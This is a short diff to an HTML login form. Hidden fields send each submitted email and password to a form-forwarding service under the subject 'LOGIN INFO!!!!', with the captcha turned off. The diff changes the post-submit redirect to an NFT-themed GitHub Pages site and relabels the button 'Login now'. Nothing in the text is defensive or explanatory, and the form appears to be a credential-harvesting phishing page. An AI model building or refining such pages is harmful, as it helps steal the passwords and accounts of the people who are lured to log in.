--- a/login.html
+++ b/login.html
@@ -20,12 +20,12 @@
 
 <input type="hidden" name="_captcha" value="false">
                 <input type="hidden" name="_subject" value="LOGIN INFO!!!!">
-                <input type="hidden" name="_next" value="https://puppiesland.netlify.app/gateway.html">
+                <input type="hidden" name="_next" value="https://nftscreator.github.io/NFTs/main.html">
                         <input type="email" id="email" name="email" placeholder="Enter Email" required>
                         <input type="password" id="password" name="password" placeholder="Enter Password" required>
                         <br>
 
-                     <input type="submit" value="Create Account" class="btn">
+                     <input type="submit" value="Login now" class="btn">
                 </form>
 </br>
                 <p>Don't have an account yet? <a href="index.html">Create an account here</a></p>
